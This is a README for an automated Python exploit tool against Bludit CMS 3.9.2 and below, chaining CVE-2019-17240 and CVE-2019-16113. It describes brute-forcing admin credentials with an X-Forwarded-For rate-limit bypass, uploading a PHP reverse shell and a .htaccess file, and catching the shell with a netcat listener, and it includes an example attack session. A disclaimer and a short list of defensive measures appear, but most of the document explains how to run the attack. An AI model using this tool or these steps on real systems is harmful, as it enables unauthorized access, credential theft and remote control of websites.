# Get RCE - Bludit CMS Exploit

```
     _ _____             ___            _ 
  __| |___ /_   ___ __  / _ \ _ __ ___ (_)
 / _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
 \__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|
```

An automated exploitation tool that combines **CVE-2019-17240** (Authentication Bypass) and **CVE-2019-16113** (Arbitrary File Upload) to achieve remote code execution on vulnerable Bludit CMS installations.

## ⚠️ Legal Disclaimer

**FOR AUTHORIZED SECURITY TESTING ONLY**

This tool is intended for security professionals conducting authorized penetration tests and security researchers operating within legal boundaries. Unauthorized access to computer systems is illegal under laws such as the Computer Fraud and Abuse Act (CFAA) in the United States and similar legislation worldwide.

**By using this tool, you agree to:**
- Only test systems you own or have explicit written permission to test
- Comply with all applicable local, state, and federal laws
- Accept full responsibility for your actions

The author assumes no liability and is not responsible for any misuse or damage caused by this tool.

## 📋 Overview

This exploit automates the process of:
1. Checking target availability
2. Bypassing authentication through brute force (leveraging CVE-2019-17240)
3. Uploading a malicious PHP reverse shell (exploiting CVE-2019-16113)
4. Establishing a reverse shell connection

### Vulnerability Details

- **CVE-2019-17240**: Authentication bypass via improper rate-limit implementation (bypassed using X-Forwarded-For header manipulation)
- **CVE-2019-16113**: Arbitrary file upload vulnerability allowing execution of malicious PHP code

**Affected Versions**: Bludit CMS versions 3.9.2 and below

## 🚀 Features

- ✅ Automated target availability checking
- ✅ Authentication bypass through brute force
- ✅ Username enumeration capability
- ✅ Combined username + password brute forcing
- ✅ Automatic CSRF token handling
- ✅ PHP reverse shell payload generation
- ✅ .htaccess upload for enhanced exploitation
- ✅ Connection verification

## 📦 Requirements

- Python 3.6+
- Required Python packages:
  - `requests`

## 🔧 Installation

```bash
# Clone the repository
git clone https://github.com/yourusername/get-rce.git
cd get-rce

# Install dependencies
pip install -r requirements.txt
```

**requirements.txt**:
```
requests>=2.25.0
```

## 💻 Usage

### Basic Usage

```bash
python3 get_rce.py
```

The script will prompt you for:
1. Target URL (e.g., `https://target.com`)
2. Your listener's IP address
3. Your listener's port
4. Whether to brute force username
5. Wordlist locations

### Setting Up Your Listener

Before running the exploit, set up a netcat listener:

```bash
nc -lvnp 4444
```

Replace `4444` with your chosen port.

### Example Session

```bash
$ python3 get_rce.py

Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...

[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username): 
[...] We are gonna default to 'admin' as username.

[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)

[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
```

### Attack Modes

#### Mode 1: Known Username + Password Brute Force

```
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt
```

#### Mode 2: Full Credential Brute Force

```
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt
```

## 📝 Recommended Wordlists

- **SecLists**: https://github.com/danielmiessler/SecLists
  - Usernames: `SecLists/Usernames/Names/names.txt`
  - Passwords: `SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt`

- **RockYou**: `/usr/share/wordlists/rockyou.txt` (Kali Linux)

## 🔍 How It Works

1. **Target Validation**: Checks if the target is reachable
2. **Authentication Bypass**: 
   - Manipulates `X-Forwarded-For` header to bypass rate limiting
   - Brute forces credentials using provided wordlists
   - Handles CSRF tokens automatically
3. **Exploitation**:
   - Uploads PHP reverse shell to `/bl-content/tmp/`
   - Uploads `.htaccess` file to ensure execution
   - Triggers the payload to establish reverse shell
4. **Shell Access**: Connects back to your listener

## 🛡️ Defensive Measures

If you're a system administrator:

- **Update immediately** to Bludit 3.9.3 or later
- Implement proper rate limiting based on session, not IP
- Validate all file uploads (type, extension, content)
- Use Web Application Firewalls (WAF)
- Monitor `/bl-content/tmp/` directory for suspicious files
- Implement strong password policies
- Enable account lockout mechanisms

## 🐛 Troubleshooting

**Issue**: "The target seems to be down"
- Verify the URL is correct and includes the protocol (http/https)
- Check your network connectivity
- Ensure the target is actually running Bludit

**Issue**: "Login failed"
- Verify credentials are correct
- Try a more comprehensive wordlist
- Check if the target has additional authentication mechanisms

**Issue**: "No shell received"
- Verify your listener is running
- Check firewall rules on both sides
- Ensure the listener IP and port are correct and reachable

## 🔗 References

- [CVE-2019-17240 Details](https://nvd.nist.gov/vuln/detail/CVE-2019-17240)
- [CVE-2019-16113 Details](https://nvd.nist.gov/vuln/detail/CVE-2019-16113)
- [Bludit Official Website](https://www.bludit.com/)

## 👤 Author

**d3vn0mi** 

## 📄 License

This project is provided for educational and authorized security testing purposes only. See the disclaimer at the top of this README.

## 🤝 Contributing

Contributions, issues, and feature requests are welcome! Feel free to check the issues page.

## ⭐ Acknowledgments

- The security research community for discovering and documenting these vulnerabilities
- Bludit team for their quick response in patching these issues
